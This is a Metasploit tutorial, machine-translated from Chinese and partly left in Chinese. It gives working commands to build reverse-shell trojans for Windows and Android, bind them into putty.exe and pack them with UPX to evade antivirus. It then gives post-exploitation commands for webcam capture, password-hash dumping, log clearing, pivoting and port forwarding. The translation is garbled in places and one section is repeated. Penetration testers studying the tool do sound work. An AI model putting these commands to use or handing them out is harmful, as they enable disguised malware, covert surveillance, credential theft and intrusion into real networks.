0.Metasploit Profile
Metasploit is an open source penetration testing framework platform, so far, msf has built thousands of disclosed vulnerabilities related modules and penetration testing tools, modules ruby language, which allows the user to the module as needed with appropriate modifications, even calling himself wrote the test module. After the attack module requires the use of selected, you only need to use simple commands to configure some parameters can be done for a test and exploit vulnerabilities, the penetration process automation, simplification.
1.Metasploit installation
Windows Platform
First, download the installer from the official website:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
Default Port: 3650
After closing the anti-virus software as an administrator to run the installer, the installation process will be included with installation PostgreSQL database for storing metasploit index within each module, such as load, speed up the search
After installation, the desktop shortcut to generate Metasploit, right to run as Administrator cmd to open and run Metasploit Console
Metasploit long time to load when you start Windows, the absence of reaction please wait 3-5 minutes
On the Windows platform, Metasploit also provides Web access interface to achieve operational graphical
Linux platform
Acquired from github
git clone https://github.com/rapid7/metasploit-framework.git
Switch to metasploit-framework directory, and execute permissions given msfconsol start
cd metasploit-framework && chmod + x msfconsole && ./msfconsole
Using the following command to download a program key installation, particularly where the network installation progress again
cd /opt && curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
Kali Linux comes with Metasploit penetration tool and automation Armitage
Android platform
When Andrews install Metasploit is actually installed on a linux Andrews subsystem, and then install Metasploit On this basis, although the process is complex and cumbersome, but penetration measured in an enterprise network environment, carrying a laptop may access the network would be too conspicuous, installed on Android phone or tablet Metasploit this case may well be an option
Prerequisite: Android phone or tablet need root privileges
Usually choose to install Termux as the basic environment, the system will start to download things, the specific time depending on the network environment of varying lengths, so you can choose to take a nap or something at this time =. = #
Termux use apt package manager, execute the following command updates
apt-get update && apt-get upgrade -y && apt dist-upgrade -y
And said next installation Metasploit linux platform to install the same
2. Use the Metasploit penetration testing
Introduction to commonly used commands at Terminal msf
msfdb init msf数据库初始化
apt install metasploit framework msf更新
msfVENOM 多平台攻击载荷生成器
msf-nasm_shell 将汇编指令转换成为对应的16进制机器码
msfconsole 打开msf终端
Introduction to commonly used commands at the terminal msf
db_status 查看数msf据库连接状态,连接数据库能够优化搜索等过程
db_rebuild_cache 重建缓存,将模块等索引重新存入数据库
db_nmap 调用nmap扫描,并将扫描结果存入数据库
help [db_connect] 显示命令的帮助信息
search [module] 搜索含有关键字的模块
use [module] 选择使用一个模块(以ms17_010永恒之蓝为例)
show payload 显示该模块支持的payload
show options 显示该模块需要设置的参数(其中required为no的表示不是必须的参数)
info 如果觉得show命令显示的不够完整可以直接输入info查看详细详细
set [opt] 使用模块后,设置模块所需要的参数的值(对应使用unset取消设置的值)
setg [opt] 设置全局参数,对于ip之类的参数可以设置为全局,当切换模块后就不需要再次设置ip参数(对应使用unsetg取消设置)
back 返回上级状态
exploit/run 两个命令都表示运行攻击模块
sessions 查看当前连接的会话
3. Use msfvenom generate Trojan file
t payload on the selection of, for various reasons such as firewall, may limit the external network access on the target host some of the internal network port, or even just some ports open and then close all other ports. In this case, the target host back to even allow an attacker to be a better option, this model is equivalent to a target host to make their external connection request is a normal flow, so you can bypass the security settings, so use a popular choice when selecting reverse band payload payload.
Usually 32 using windows / meterpreter_reverse_tcp and 64 using windows / x64 / meterpreter_reverse_tcp. Of course, still need to select different loads according to different needs
to view available loads / encoder / nops / all lists
msfvenom -l payload/encoders/nops/all
View Trojan file format that can be generated using the -f format specified Trojan
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe
Trojan generated Andrews
msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk
msf terminal monitors will not even answer
use exploit/multi/handler 该模块用于接收回连会话,一般只需要设置监听主机和端口号
4. Trojan free to kill
Mixed use multiple encoders for multiple coding
is not recommended, to avoid killing rate, long encoding time, and the resulting situation after the Trojans might not run or run can not connect back to the end of the attack will be
"-f raw" represents the generation of the original Trojan this pipeline generated by the Trojans need only continue to pass, so only need to specify the format generated in the last command, and before that should be used raw original Trojan
Bundled into a normal file
recommended, bundling enables users to relax their vigilance after the Trojans to a normal file, in real life, we should pay attention than the hash value of the file with the official's
choice of binding targets, it may not run after bundling appear case, in this case try to use the encoder, or the replacement target binding, by way of example herein to putty
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe
Packers
recommended, packers technology to circumvent the soft kill detect a certain extent, used here upx packers on linux commonly used, for example, packed, there are many tools on the windows, can choose
upx -5 backdoor_raw.elf -5 indicates compression level (1-9), detailed reference upx -h command
above method using a comprehensive
attach a Trojan online testing site: http://www.virscan.org/
Bundled into a normal file
recommended, bundling enables users to relax their vigilance after the Trojans to a normal file, in real life, we should pay attention than the hash value of the file with the official's
choice of binding targets, it may not run after bundling appear case, in this case try to use the encoder, or the replacement target binding, by way of example herein to putty
Packers
recommended, packers technology to circumvent the soft kill detect a certain extent, used here upx packers on linux commonly used, for example, packed, there are many tools on the windows, can choose
upx -5 backdoor_raw.elf -5 indicates compression level (1-9), detailed reference upx -h command
above method using a comprehensive
attach a Trojan online testing site: http://www.virscan.org/
After 5.meterpreter use penetration
By exploit / multi / handler monitor module, and to establish a connection with the target host, can be performed using an osmotic using the meterpreter
pwd 打印当前工作目录
sysinfo 查看系统信息
ps 查看当前目标机上运行的进程列表和pid
webcam_snap 调用相机拍摄照片(使用webcam_stream能够通过浏览器模拟录像机,实现实时监控)
run vnc 运行vnc远程查看屏幕(run screen_unlock实现远程控制)
run post/windows/manage/enable_rdp 如果目标主机是windows系统,使用该命令开启目标的远程桌面3389
screenshot 截取目标主机当前屏幕
getuid 获取当前权限的用户id
getsystem 获取system权限
hashdump 获取用户名与hash口令
shell 获取目标主机shell(windows环境下中文乱码的解决办法:chcp 65001
Ctrl+Z 退出shell模式,返回到meterpreter
upload 上传一个文件
download 下载一个文件
excute 执行目标系统中的文件(-f 指定文件,-i执行可交互模式,-H隐藏窗口)
clearev 清除日志
background 将Meterpreter放入后台(使用session -i重新连接到会话)
6.Meterpreter carried out within the network penetration Profile
During infiltration, when you can get permission to connect to the host of a public network of units, which hosts may also be connected with an internal local area network, and other hosts within the LAN does not have permission to access the outside. This is a very common LAN mode, usually within a few hosts can not connect outside the network can store some sensitive documents, and can now be controlled by the host that as a springboard for an attacker to access internal network, for the implementation of internal penetration network
routing within the network to add reach
run get_local_subnets 获取目标主机上的子网状态,其中192.168.16.0和攻击机在同一个网段,169.254.0.0是vritualbox的内部网卡模式
run autoroute -s 169.254.0.0/16 1 使用autoroute模块添加到达内网的路由经session 1转发
run autoroute -p 查看当前的路由表,可以看到发往169.254.0.0网段的流量都将通过session 1转发
接下来就可以在msf下使用db_nmap扫描内网存活主机,针对内网的开放端口进行攻击
portfwd端口转发
端口转发能够将内网端口转发到本地主机的端口,相当于virtualbox的端口映射功能。
portfwd -h 查看帮助信息
portfwd add -l 7070 -r 192.168.16.59 -p 3389 将目标主机192.168.16.59的3389转发到本地主机的7070端口
rdesktop 127.0.0.1:7070 端口转发成功后就可以从本地端口连接rdp
Reference books "Metasploit The Penetration Tester's Guide." "Metasploit Penetration Testing Guide (Revised Edition)"